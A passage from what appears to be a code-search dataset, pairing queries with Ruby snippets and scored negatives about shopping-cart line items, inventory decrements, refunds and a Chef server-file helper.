"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def decrement_line_item_quantity(line_item_id)\n current_item = line_items.find(line_item_id)\n if current_item.quantity > 1\n current_item.quantity -= 1\n else\n current_item.destroy\n end\n current_item\n end",
"def recover_usage(quantity_to_be_recovered)\n self.used_quantity -= quantity_to_be_recovered \n self.save \n \n self.unmark_as_finished\n \n item = self.item \n item.update_ready_quantity\n \n return self \n end",
"def find_match_and_decrement_available(line_item)\n gs = Orders::LineItemPresenter.new(line_item).global_sku\n if rii = ReturnInventoryItem.where([\"upc= ? and active = true and available > 0\", gs&.id]).first\n rii.available -= 1\n rii.save\n elsif gs\n #do this check since global skus are jacked up and can't be trusted\n gs = GlobalSku.where(\n style_number: gs.style_number,\n product_name: gs.product_name,\n size: gs.size,\n color_id: gs.color_id,\n customisation_id: gs.customisation_id,\n height_value: gs.height_value,\n product_id: gs.product_id,\n ).first\n\n if rii = ReturnInventoryItem.where([\"upc = ? and active = true and available > 0\", gs&.id]).first\n rii.available -= 1\n rii.save\n end\n end\n rii\n end",
"def decrease\n @line_item = @current_cart.line_items.where(:id => params[:line_item_id]).first\n if @line_item.count > 0\n @line_item.update_attribute :count, @line_item.count - 1\n else\n @line_item.destroy # destroy database record if quantity was decreased to 0\n end\n end",
"def refill(item_name:, quantity:)\n total_items_quantity[item_name] += quantity\n items_running_low[item_name] = false\n end",
"def recover_usage(quantity_to_be_recovered)\n self.used_quantity -= quantity_to_be_recovered \n self.save \n \n self.unmark_as_finished\n \n \n \n item = self.item \n item.add_ready_quantity( quantity_to_be_recovered ) \n \n return self \n end",
"def check_line_item_in_inventory(line_item)\n # feature flipper\n if Features.inactive?(:refulfill)\n return true\n end\n found = false\n\n if rii = find_match_and_decrement_available(line_item)\n if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n end\n end\n found\n end",
"def perform_scrap_item_replacement( scrap_recover_quantity) \n self.scrapped_quantity -= scrap_recover_quantity \n self.save \n \n self.unmark_as_finished \n \n item.deduct_scrap_quantity( scrap_recover_quantity ) \n \n return self\n end",
"def perform_scrap_item_replacement( scrap_recover_quantity) \n self.scrapped_quantity -= scrap_recover_quantity \n self.save \n \n self.unmark_as_finished \n \n item.deduct_scrap_quantity( scrap_recover_quantity ) \n \n return self\n end",
"def remove_lineitem\n line_item = @sale.line_items.find_by_id(params[:line_item])\n respond_to do |format|\n if line_item.present?\n line_item.item.stock_amount = line_item.item.stock_amount + line_item.quantity\n line_item.item.save\n line_item.destroy\n end\n update_totals\n\n format.js { ajax_refresh }\n end\n end",
"def checkout_cart\n self.line_items.each do |li|\n li.item.inventory -= li.quantity\n li.item.save\n end\n self.line_items.clear\n self.status = \"submitted\"\n self.user.current_cart_id = nil\n self.user.save\n end",
"def destroy\n @line_item = LineItem.find(params[:id])\n product = Product.find_by_id(@line_item.product.id)\n product.update_attributes(:remaining_quantity => (product.remaining_quantity + @line_item.quantity))\n @line_item.destroy\n\n respond_to do |format|\n format.html { redirect_to(orders_path) }\n format.json { head :ok }\n end\n end",
"def decline_refund\n response = JSON.parse(@client.patch(\"items/#{send(:id)}/decline_refund\").body)\n @attributes = response['items']\n true\n end",
"def deduct_quantity\n line_items.each do |i|\n i.product.current_stock -= i.quantity\n i.product.save\n end\n end",
"def reclaim!(distribution)\n ActiveRecord::Base.transaction do\n distribution.line_items.each do |line_item|\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n inventory_item.update_attribute(:quantity, inventory_item.quantity + line_item.quantity)\n end\n end\n distribution.destroy\n end",
"def single_sell_in_day_remover(item)\r\n item.sell_in -= 1\r\n end",
"def release_quantity_of_item(item, quantity)\r\n if self.items.include?(item)\r\n item.quantity -= quantity\r\n end\r\n end",
"def issue_refer_line_items\n line_items.each do |line|\n logger.debug \"==@@@@==SalesOrder refer_line_id== #{line.refer_line_id}\"\n po_line = LineItem.find(line.refer_line_id)\n po_line.update_attribute(:quantity_issued, po_line.quantity_issued + line.quantity)\n\n line.update_attribute(:cart_id, nil)\n end\n end",
"def unequip_item\n\t\tself.equiped = false\n\t\tself.save\n\tend",
"def withdraw exit_date, estimated_return_date, pickup_company, pickup_company_contact, additional_comments, quantity, folio\n \n return self.status if cannot_withdraw?\n\n if quantity != '' and quantity < self.quantity.to_i\n self.quantity = self.quantity.to_i - quantity\n quantity_withdrawn = quantity\n else\n self.status = InventoryItem::OUT_OF_STOCK\n quantity_withdrawn = self.quantity\n self.quantity = 0\n end\n \n if self.save\n inventory_item = InventoryItem.where( 'actable_id = ? AND actable_type = ?', self.id, 'BulkItem' ).first\n if self.warehouse_locations?\n quantity_left = quantity\n if quantity != '' and quantity < ( self.quantity.to_i + quantity_withdrawn.to_i )\n item_location = self.item_locations.where( 'quantity >= ?', quantity ).first\n location = item_location.warehouse_location\n location.remove_quantity( inventory_item.id, quantity )\n elsif quantity != ''\n while quantity_left > 0\n item_location = self.item_locations.first\n location = item_location.warehouse_location\n if quantity_left >= item_location.quantity \n current_location_quantity = item_location.quantity \n location.remove_item( inventory_item.id )\n self.item_locations.delete( item_location )\n location.update_status\n else\n location.remove_quantity( inventory_item.id, quantity_left )\n end\n quantity_left = quantity_left - current_location_quantity\n end\n else\n item_location = self.item_locations.first\n location = item_location.warehouse_location\n location.remove_item( inventory_item.id )\n self.item_locations.delete( item_location )\n location.update_status\n end\n end\n CheckOutTransaction.create( :inventory_item_id => inventory_item.id, :concept => 'Salida granel', :additional_comments => additional_comments, :exit_date => exit_date, :estimated_return_date => estimated_return_date, :pickup_company => pickup_company, :pickup_company_contact => pickup_company_contact, :quantity => quantity_withdrawn, :folio => folio )\n return true\n end\n\n return false\n end",
"def refund!\n response = credit_card.credit!(total_amount_in_cents, payment.authorization)\n self.response = response\n self.description = response.message\n self.authorization = response.authorization\n if response.success?\n invoice.update_attribute(:status, \"closed\")\n self.status = \"cleared\"\n self.save!\n return true\n else\n self.status = \"failed\"\n for item in self.line_items\n item.amount = 0\n end\n self.save!\n return false\n end\n end",
"def mark_monthlyinvitems_for_removal \n monthlyinvitems.each do |monthlyinvitem|\n monthlyinvitem.mark_for_destruction if monthlyinvitem.qty.to_f == 0.0\n end \n end",
"def remove\n if @item.quantity == 1\n @item.destroy!\n else\n @item.decrement(:quantity)\n @item.save!\n end\n\n refresh\n end",
"def remove_items_from_cart\n line_items.each { |i| i.cart = nil }\n end",
"def use_item(item_name:, quantity:)\n total_items_quantity[item_name] -= quantity\n end",
"def sell_inventory(material, quantity)\n material.quantity -= quantity\n end",
"def remove_line_item(line_item)\n unless self.ordered?\n line_item.destroy\n end\n end",
"def remove_item\n\t\tset_sale\n\t\tpopulate_products\n\n\t\tline_item = Item.where(sale_id: params[:sale_id], product_id: params[:product_id]).first\n\t\tline_item.quantity -= 1\n\n\t\tif line_item.quantity == 0\n\t\t\tline_item.destroy\n\t\telse\n\t\t\tline_item.save\n\t\t\tupdate_line_item_totals(line_item)\n\t\tend\n\n\t\t# Llama método que devuelve cantidad al stock\n\t\treturn_item_to_stock(params[:product_id])\n\n\t\tupdate_totals\n\n\t\trespond_to do |format|\n\t\t\tformat.js { ajax_refresh }\n\t\tend\n\tend",
"def destroy_or_save(line_item, line_item_quantity)\n line_item_quantity.zero? ? line_item.destroy! : line_item.save!\n end",
"def uncomplete(item)\n args = {id: item.id}\n return @client.api_helper.command(args, \"item_uncomplete\")\n end",
"def unequip(item)\n return {:status => \"Item not equipped\"} unless item.equipped?\n\n perform(0) do |notifications|\n item.unequip!\n notifications[:status] = \"Unequipped #{item}\"\n end\n end",
"def reserve_inventory!(order_quantity)\n self.quantity -= order_quantity\n save!\n end",
"def decrease_sell_in(item)\n item.sell_in -= 1\n end",
"def item_inventory_update\n \n item = Item.find(params[:item_id])\n order= Order.find(params[:id])\n item_order = ItemOrder.where(item_id: item.id, order_id: order.id).first\n new_inventory = item.inventory - item_order.quantity\n item_order.update(status: \"fulfilled\")\n item.update(inventory: new_inventory)\n end",
"def flunk(workitem, err_class_or_instance, *err_arguments)\n\n r = remove_workitem('reject', workitem)\n\n return flunk(workitem) if r != nil\n\n workitem.h.delete('_rev')\n\n super(workitem, err_class_or_instance, *err_arguments)\n end",
"def rollback_item\n ingreso_producto = self.ingreso_producto\n ingreso_producto.cantidad = ingreso_producto.cantidad + self.cantidad\n ingreso_producto.producto.stock = ingreso_producto.producto.stock + self.cantidad #suma al stock si se anula\n Lineakardex.create(:kardex => ingreso_producto.producto.kardex, :tipo => \"Entrada\", :fecha => Time.now, :cantidad => self.cantidad, :v_unitario => self.ingreso_producto.producto.precio_venta, :modulo => \"Hospitalizacion\", :observaciones => \"Pedido Anulado\" )\n ingreso_producto.save\n ingreso_producto.producto.save\n end",
"def update_cart_line_item(a_line_item, quantity, options={})\n return remove(a_line_item, options) if quantity <= 0\n item = find(:first, a_line_item)\n item.quantity = quantity if item\n item\n end",
"def destroy\n\n if params[:product_id] then\n# TODO need to use @cart.id to ensure only this users line_item is accessed.\n current_item = LineItem.find_by_product_id(params[:product_id] )\n else\n current_item = LineItem.find(params[:id])\n end\n\n if current_item\n current_item.quantity -= 1\n puts current_item.quantity\n if current_item.quantity <= 0\n current_item.destroy\n else\n current_item.save\n end\n else\n current_item.destroy\n end\n\n respond_to do |format|\n format.html { redirect_to store_url }\n format.json { head :no_content }\n end\n end",
"def decrement_inventory!\n self.available_inventory = self.available_inventory - 1\n self.save\n end",
"def toggle_down_inventory\n self.available_inventory -= 1\n self.save\n\n return self.available_inventory\n end",
"def lose_item(item, n, include_equip = false)\n gain_item(item, -n, include_equip)\n end",
"def destroy\n @line_item.destroy\n destroy_line_item_response\n end",
"def remove!(donation_or_purchase)\n log = {}\n donation_or_purchase.line_items.each do |line_item|\n inventory_item = InventoryItem.find_by(storage_location: id, item_id: line_item.item_id)\n if (inventory_item.quantity - line_item.quantity) <= 0\n inventory_item.destroy\n else\n inventory_item.update(quantity: inventory_item.quantity - line_item.quantity)\n end\n log[line_item.item_id] = \"-#{line_item.quantity}\"\n end\n log\n end",
"def return_item\n items = self.see_purchases.map do |merchandise|\n {name: merchandise.name, merch_id: merchandise.id}\n end\n merch = TTY::Prompt.new.select(\"Here is a list of your purchases. What would you like to return?\",items)\n purchase = self.specific_purchase(merch)\n purchase.destroy \n puts \"your item has been refunded!\"\n restock = self.select_merchandise(merch)\n restock.update(inventory: restock.inventory + 1)\n end",
"def reset_item(item, date: nil, finish_date: nil, resume: false)\n date ||= Time.now\n item.date = date\n if finish_date\n item.tag('done', remove: true)\n item.tag('done', value: finish_date.strftime('%F %R'))\n else\n item.tag('done', remove: true) if resume\n end\n logger.info('Reset:', %(Reset #{resume ? 'and resumed ' : ''} \"#{item.title}\" in #{item.section}))\n item\n end",
"def purge!\n unless self.ordered?\n self.line_items.each do |line_item|\n remove_line_item(line_item) if line_item.invalid?\n end\n end\n end",
"def remove_item(item, amount)\n # Check if the Entity already has that item\n # in the inventory. If so, just decrease\n # the amount.\n @inventory.each_with_index do |couple, index|\n if (couple.first == item)\n couple.second -= amount\n if (couple.second <= 0)\n @inventory.delete_at(index)\n end\n return\n end\n end\n end",
"def deduct(line_item_units)\n\t\tself.units_on_hand = self.units_on_hand - line_item_units \n\t\t# self.units_on_hand =- line_item_units <- means the same thing =- is shorthand\n\t\tself.save!\n\tend",
"def intend(item)\n return unless item\n intended.remove_class(:intended) if intended\n item.add_class(:intended)\n end",
"def intend(item)\n return unless item\n intended.remove_class(:intended) if intended\n item.add_class(:intended)\n end",
"def issue_unissue_po_line_items_when_so_and_cart_diffs(issue_cart)\n logger.debug \"==@@@@==SalesOrder: issue unissue(), issuce_cart.id==== #{issue_cart.id}\"\n # so line_items not in cart(will be removed), issueback po\n self.line_items.each do |so_line|\n if not issue_cart.line_items.where(line_number: so_line.line_number).exists?\n logger.debug \"==@@@@==line_items to be removed from so==== #{so_line.id}\"\n self.issue_back_refer_line_item(so_line, so_line.quantity)\n end\n end\n\n # cart line_items not in so(will be added), issue po\n issue_cart.line_items.each do |line_item|\n # cart line_items not in so: to be added to so\n if not self.line_items.where(line_number: line_item.line_number).exists?\n logger.debug \"==@@@@==new line, to be added to so==== #{line_item.id}\" \n self.issue_refer_line_item(line_item, line_item.quantity) \n else # exist, but quantity different\n line = self.line_items.where(line_number: line_item.line_number).take\n logger.debug \"==@@@@==exsit line, update po==== #{line_item.id}\"\n if line.quantity < line_item.quantity\n self.issue_refer_line_item(line_item, line_item.quantity - line.quantity)\n elsif line.quantity > line_item.quantity\n self.issue_back_refer_line_item(line_item, line.quantity - line_item.quantity) \n end\n end\n end\n end",
"def down_item\n order_op2(false, @item)\n end",
"def use_item(item, entity)\n index = has_item(item)\n if index\n actual_item = inventory[index].first\n actual_item.use(self, entity)\n remove_item(actual_item) if actual_item.consumable\n else\n print NO_SUCH_ITEM_ERROR\n end\n end",
"def decrement_product_inventory_count!\n self.decrement!(:inventory_count, 1)\n end",
"def cancel!\n self.update_attributes(status: CANCELLED)\n #self.line_items.update_attributes(status: LineItem::CANCELLED)\n end",
"def remove_item\n\n end",
"def void_last_transaction\n transaction = @transactions.pop\n self.total -= (transaction.price * transaction.quantity)\n transaction.quantity.times{self.items.delete(transaction.item_name)}\n end",
"def remove_item\n product = Product.find_by_cs_sku(params[:sku])\n item = ReservedItem.find_by_sql(['SELECT qty FROM reserved_items where user_id = ? and product_id = ? and session_id = ?',\n current_user.id,\n product.id,\n session.id]).first\n unless item.nil?\n product.update_attribute(:qty, product.qty + item.qty)\n ReservedItem.delete_all(['user_id = ? and product_id = ? and session_id = ?', current_user.id,\n product.id,\n session.id])\n end\n\n respond_with_format { @cart.remove_item params[:sku] }\n end",
"def destroy\n\t\t@line_item.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to line_items_url, notice: \"Req ID: #{@line_item.id} removed.\" }\n\t\t\tformat.json { head :no_content }\n\t\tend\n\tend",
"def remove_item(item)\n order_item = self.order_items.where(item: item).order('price asc').first\n if order_item.is_a? OrderItem\n order_item.remove 1\n recalculate!\n end\n end",
"def toggle_faulty\n @item.toggle!(:faulty)\n end",
"def void_last_transaction\n #binding.pry\n @total -= @last_price * @last_quantity\n @last_quantity.times do\n @items.pop\n end\n\n end",
"def destroy_booking_line(item_id)\n\n product_lines = self.booking_lines.select do |booking_line|\n booking_line.item_id == item_id\n end\n\n if booking_line = product_lines.first\n transaction do\n self.item_cost -= booking_line.item_cost\n self.product_deposit_cost -= booking_line.product_deposit_cost\n self.category_supplement_1_cost -= booking_line.category_supplement_1_cost\n self.category_supplement_2_cost -= booking_line.category_supplement_2_cost\n self.category_supplement_3_cost -= booking_line.category_supplement_3_cost \n self.calculate_cost(false, false)\n self.save\n booking_line.destroy\n # Create newsfeed\n ::Yito::Model::Newsfeed::Newsfeed.create(category: 'booking',\n action: 'destroy_booking_line',\n identifier: self.id.to_s,\n description: BookingDataSystem.r18n.t.booking_news_feed.destroyed_booking_line(item_id),\n attributes_updated: {item_id: item_id}.merge({booking: newsfeed_summary}).to_json)\n end\n self.reload\n end\n\n end",
"def remove_item(item_to_remove)\r\n self.credits = self.credits + item_to_remove.get_price\r\n self.item_list.delete(item_to_remove)\r\n end",
"def remove_item(item_to_remove)\r\n self.credits = self.credits + item_to_remove.get_price\r\n self.item_list.delete(item_to_remove)\r\n end",
"def offer_an_item(item)\r\n item.status = true\r\n end",
"def unpaid_line_items\n @unpaid_line_items ||= line_items.find_all_by_paid(false)\n end",
"def restore\n @item = @collection.items.get(params[:item_id])\n old_item = @item.versions.first(:deleted_at => params[:deleted_at])\n att = old_item.attributes\n att.delete(:deleted_at)\n att.delete(:original_uid)\n att.delete(:id)\n if @item.update(att)\n flash[:notice] = \"Item Restored Successfully!\"\n redirect_to project_collection_item_path(@project, @collection, @item)\n else\n flash[:error] = \"Item failed to restore!\"\n render :show\n end\n end",
"def reduce_inventory\n begin\n if @product_available_stock.update_attribute(:items_count,\n @product_available_stock.items_count -\n inventory_stock_params[:items_count])\n response = {message: 'Inventory has been reduced of particular product stock of in specified distribution center.'}\n status_code = 200\n else\n response = {errors:\n [{detail: \"We can't apply this operation at this time, please try later.\"}]}\n status_code = 403\n end\n rescue => ex\n response = {errors: [{detail: ex.message}]}\n status_code = 403\n end\n render json: response, status: status_code\n end",
"def rl_maybe_unsave_line()\r\n if (@_rl_saved_line_for_history)\r\n # Can't call with `1' because rl_undo_list might point to an undo\r\n # list from a history entry, as in rl_replace_from_history() below.\r\n rl_replace_line(@_rl_saved_line_for_history.line, false)\r\n @rl_undo_list = @_rl_saved_line_for_history.data\r\n @_rl_saved_line_for_history = nil\r\n @rl_point = @rl_end # rl_replace_line sets rl_end\r\n else\r\n rl_ding()\r\n end\r\n 0\r\n end",
"def reset\n @item_ids = []\n end",
"def remove_quantity(inventory_item_id, quantity, concept = 3)\n item_location = ItemLocation.find_by(\n inventory_item_id: inventory_item_id,\n warehouse_location_id: id\n )\n\n return NOT_ENOUGH_STOCKS if quantity > item_location.quantity\n\n item_location.quantity -= quantity\n quantity = item_location.quantity if item_location.quantity.negative?\n\n item_location.save\n WarehouseTransaction.create(\n inventory_item_id: inventory_item_id,\n warehouse_location_id: id,\n quantity: quantity,\n concept: concept\n )\n\n if item_location.quantity <= 0\n item_location.destroy\n return 0\n end\n update_status\n item_location.quantity\n end",
"def rl_revert_line(count, key)\r\n if @rl_undo_list.nil?\r\n rl_ding()\r\n else\r\n while (@rl_undo_list)\r\n rl_do_undo()\r\n end\r\n if (@rl_editing_mode == @vi_mode)\r\n @rl_point = @rl_mark = 0 # rl_end should be set correctly\r\n end\r\n end\r\n 0\r\n end",
"def remove_last_item_from_items_collected_at_desk\n $items_collected.delete($items_collected.last)\n# returns user to previous task of choosing item from desk\n desk_options\nend",
"def lose_item(item, amount, include_equip = false, opp = Vocab::Coinbase, info = '', display = true)\n gain_item(item, -amount, true, opp, info, display) if include_equip\n gain_item(item, -amount, false, opp, info, display) if !include_equip\n end",
"def reset_item(value = nil, **opt)\n set_item(value, **opt).presence\n end",
"def test_should_remove_first_line_item_from_invoice\r\n assert_no_difference 'Invoice.count' do\r\n assert_difference 'LineItem.count', -1 do\r\n @basic_user.edits_invoice(invoices(:invoice_with_line_items).id)\r\n \r\n #get first row in the table.\r\n trows = @basic_user.line_items_rows\r\n assert_equal 2, trows.length\r\n tr1 = trows[::WatirBrowser.item_index(1)]\r\n assert tr1.exists?\r\n @basic_user.populate(tr1.text_field(:name, \"invoice[line_items_attributes][][description]\"),\"Removed Description one\")\r\n\r\n #remove the first line item\r\n tr1.link(:name, 'remove').click\r\n\r\n @basic_user.submits\r\n end\r\n end\r\n \r\n invoice = Invoice.find(invoices(:invoice_with_line_items).id)\r\n assert_equal 1, invoice.line_items.count\r\n assert_equal line_items(:line_item_two).description, invoice.line_items[0].description\r\n end",
"def test_should_remove_second_line_item_from_invoice\r\n assert_no_difference 'Invoice.count' do\r\n assert_difference 'LineItem.count', -1 do\r\n @basic_user.edits_invoice(invoices(:invoice_with_line_items).id)\r\n \r\n #get first row in the table.\r\n trows = @basic_user.line_items_rows\r\n assert_equal 2, trows.length\r\n tr2 = trows[::WatirBrowser.item_index(2)]\r\n assert tr2.exists?\r\n @basic_user.populate(tr2.text_field(:name, \"invoice[line_items_attributes][][description]\"),\"Removed Description two\")\r\n\r\n #remove the second line item\r\n tr2.link(:name, 'remove').click\r\n\r\n @basic_user.submits\r\n end\r\n end\r\n \r\n invoice = Invoice.find(invoices(:invoice_with_line_items).id)\r\n assert_equal 1, invoice.line_items.count\r\n assert_equal line_items(:line_item_one).description, invoice.line_items[0].description \r\n \r\n end",
"def remove_item_verify\n\n\t\twait_for_animate\n\t\tvalue3= query(\"* marked:'quantityText'\", :text)[0]\n\t\tguide_price3 = query(\"* marked:'basket_action_bar_up'\", :text)[0]\n\t\tputs \"Quantity Before remove Item : : #{value3}\"\n\t\ttouch(\"* id:'remove_btn'\")\n\t\twait_for_animate\n\t\tsleep 4\n\t\t#wait_for_elements_exist( [\"button marked:'Open basket'\"], :timeout => 40)\n\t\tvalue4 = query(\"* marked:'quantityText'\", :text)[0]\n\t\tguide_price4 = query(\"* marked:'basket_action_bar_up'\", :text)[0]\n\t\tputs \"Values guide price & Quantity(remove :After) : #{guide_price4} #{value4}\"\n\t\tputs \"Count guide price #{guide_price4}\"\n\t\tputs \"Quantity campare\"\n\t\tcampare_values(value3, value4)\n\t\t# puts \"guideprice campare\"\n\t\t# campare_values(guide_price3,guide_price4)\n\t\t#puts \"Item added successfully\"\n\tend",
"def remove_item(item)\n if !@item\n log(\"Nothing is equipped in that EquipSlot.\")\n return\n end\n if @item != item\n log(\"Item being removed from EquipSlot is not the same as already equipped item.\")\n return\n end\n @item = nil if @item == item\n return\n end",
"def delete_all_line_items_for_inventory_item_id inventory_item_id\n line_items.destroy(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.id == inventory_item_id)})\n end",
"def test_order_line_item_quantity_is_postive\n a_towel = items(:towel)\n an_order_line_item = OrderLineItem.for_product(a_towel)\n an_order_line_item.quantity = -1;\n assert_raise(ActiveRecord::RecordInvalid) { \n an_order_line_item.save!\n }\n an_order_line_item.quantity = 0\n assert_raise(ActiveRecord::RecordInvalid) {\n an_order_line_item.save!\n }\n an_order_line_item.quantity = 1\n assert_nothing_raised {\n an_order_line_item.save!\n }\n end",
"def change_inventory_items_for_vendor vendor_id, inventory_item_ids\n\n # Remove all menu items where we are dealing with this vendor, but leave the fee, if any\n line_items.destroy(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.vendor_id == vendor_id)})\n\n inventory_item_ids.each do |id|\n line_items.push(create_line_item_from_inventory_item(InventoryItem.find(id), 0, Vendor.find(vendor_id), account, false, false, \"\"))\n end\n\n trigger_event_rollup\n\n end",
"def clearance_items!\n return if @batch_ids.empty?\n @batch.save!\n @batch_ids.each do |item_id|\n item = Item.find(item_id)\n item.clearance!\n # NOTE: Considered adding a catch here if the item fails to save.\n # Feels unneeded as the item cannot possibly have invalid state at this point.\n @batch.items << item\n @notices << \"Item #{item_id} Clearanced Successfully!\"\n end\n end",
"def void_last_transaction\n @items.slice!(@items.length-@last_qty, @items.length)\n @total -= @last_transaction.values[0]\n end",
"def consume_item(item)\n if item.is_a?(RPG::Item) and item.consumable\n lose_item(item, 1)\n end\n end",
"def clear_line_items\n @line_items = []\n end",
"def move_inventory!(transfer)\n updated_quantities = {}\n item_validator = Errors::InsufficientAllotment.new(\"Transfer items exceeds the available inventory\")\n transfer.line_items.each do |line_item|\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n new_inventory_item = transfer.to.inventory_items.find_or_create_by(item: line_item.item)\n next if inventory_item.nil? || inventory_item.quantity == 0\n if inventory_item.quantity >= line_item.quantity\n updated_quantities[inventory_item.id] = (updated_quantities[inventory_item.id] || inventory_item.quantity) - line_item.quantity\n updated_quantities[new_inventory_item.id] = (updated_quantities[new_inventory_item.id] ||\n new_inventory_item.quantity) + line_item.quantity\n else\n item_validator.add_insufficiency(line_item.item, inventory_item.quantity, line_item.quantity)\n end\n end\n \n raise item_validator unless item_validator.satisfied?\n\n update_inventory_inventory_items(updated_quantities)\n end",
"def adjust!(adjustment)\n updated_quantities = {}\n item_validator = Errors::InsufficientAllotment.new(\"Adjustment exceeds the available inventory\")\n\n adjustment.line_items.each do |line_item|\n\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n next if inventory_item.nil? || inventory_item.quantity == 0\n\n if ((inventory_item.quantity + line_item.quantity) >= 0)\n updated_quantities[inventory_item.id] = (updated_quantities[inventory_item.id] || inventory_item.quantity) + line_item.quantity\n else\n item_validator.add_insufficiency(line_item.item, inventory_item.quantity, line_item.quantity)\n end\n\n end\n\n raise item_validator unless item_validator.satisfied?\n\n update_inventory_inventory_items(updated_quantities)\n end",
"def set_sellable_item_state(state_result)\n if !state_result[:inventory_item].nil?\n if (state_result[:inventory_item].quantity > state_result[:inventory_item].item.quantity_threshold)\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"Available\"))\n elsif (state_result[:inventory_item].quantity == 0)\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"Out_of_Stock\"), inventory_item_condition: InventoryItemCondition.find_by(name: \"Not_Sellable\"))\n else\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"CriticaL_Level\"))\n end\n end\n end",
"def remove\n\t\t# se o usuário não entiver infectado e já existir o inventário salvo, remove a quantidade no inventário\n\t\tunless User.healthy? inventory_params[:user_id]\n \t \trender json: { error: \"Denied access. User is contaminated!\" }, status: 403 and return\n\t\tend\n\n\t\tif @inventory.remove(inventory_params[:amount].to_i)\n\t\t\trender json: @inventory, status: 200\n\t\telse\n\t\t\trender json: @inventory.errors, status: :unprocessable_entity\n\t\tend\n\tend",
"def item_effect_miss\r\n self.damage = 'Miss'\r\n end",
"def approve!\n inventory.restock!(self, Time.current, inventory_check)\n update!(adjustment: difference)\n end",
"def remove_item(user, item)\n before = get_item_count\n self.items.delete(item)\n after = get_item_count\n (before-after-1).times do\n user.add_to_list(item)\n end\n end",
"def decline\n order = current_user.restaurant.orders.find(params[:id])\n order.update(status: 2)\n render json: {is_success: true}, status: :ok\n end",
"def delete_all_line_items_for_inventory_item_id inventory_item_id\n destroy_line_items(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.id == inventory_item_id)})\n end",
"def erasure_record\n ax_order_line_items.destroy_all unless ax_order_line_items.blank?\n self.update_attributes(\n :ax_account_id => \"\",\n :ax_account_number => \"\",\n :delivery_city => \"\",\n :delivery_country_region_id => \"\",\n :delivery_county => \"\",\n :delivery_date => \"\",\n :delivery_state => \"\",\n :delivery_street => \"\",\n :delivery_zip_code => \"\",\n :purch_order_form_num => \"\",\n :sales_tax => 0.0,\n :shipping_charges => 0.0,\n :discounts => 0.0,\n :sales_status => \"\",\n :status => \"ERASURED\"\n )\n end",
"def destroy\n @line_item = @current_cart.line_items.where(:id => params[:id]).first\n unless @line_item.nil?\n @line_item.destroy\n end\n end",
"def process_item(item_id)\n @item_id = item_id.to_i\n @batch_ids << @item_id unless precheck_clearancing_error\n end",
"def change_item_state(checklist, item)\n id = item.id\n pos = item.pos\n # checked = item.state_was == \"complete\" ? true : false\n name = item.name\n checklist.delete_checklist_item(id)\n checklist.add_item(name, true, pos)\n checklist.save\nend"
] | [
"0.6766502",
"0.6419233",
"0.6412429",
"0.63957113",
"0.6360755",
"0.63582975",
"0.6263182",
"0.6224137",
"0.6224137",
"0.6195032",
"0.61344975",
"0.6108307",
"0.60007876",
"0.59919155",
"0.59865284",
"0.5963751",
"0.59574777",
"0.5936173",
"0.5917403",
"0.59152454",
"0.5883776",
"0.5852342",
"0.5852244",
"0.5851688",
"0.58293056",
"0.5823706",
"0.58211774",
"0.57900196",
"0.57875526",
"0.5756652",
"0.5717471",
"0.57170516",
"0.5709641",
"0.570885",
"0.5700656",
"0.5694606",
"0.56908053",
"0.56829214",
"0.56686455",
"0.5661349",
"0.56586903",
"0.56376386",
"0.56335866",
"0.56252366",
"0.5610645",
"0.5600268",
"0.5595381",
"0.5591146",
"0.5585776",
"0.5585776",
"0.55711204",
"0.5569774",
"0.55697334",
"0.5568788",
"0.55665517",
"0.5556423",
"0.55267006",
"0.550985",
"0.55075705",
"0.5500227",
"0.5493364",
"0.5491079",
"0.54903644",
"0.5469518",
"0.5469518",
"0.54631263",
"0.54602444",
"0.54506445",
"0.5436094",
"0.5433495",
"0.54330635",
"0.54288733",
"0.5424726",
"0.54235774",
"0.54085875",
"0.5405175",
"0.5398094",
"0.53898084",
"0.5380695",
"0.53781635",
"0.5365065",
"0.5361939",
"0.53580475",
"0.53559256",
"0.5355611",
"0.53527874",
"0.535237",
"0.53514844",
"0.5351122",
"0.53427714",
"0.53412855",
"0.5337084",
"0.5336788",
"0.53261495",
"0.53244185",
"0.5323523",
"0.5323334",
"0.53218234",
"0.5318314",
"0.53157437"
] | 0.6989728 | 0 |
Cookbook Name:: tieredchefserver Libraries:: helpers | def server_file(uri)
require 'pathname'
require 'uri'
Pathname.new(URI.parse(uri).path).basename.to_s
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_helper(node)\n Chef::RemoteRecipe.factory(node)\n end",
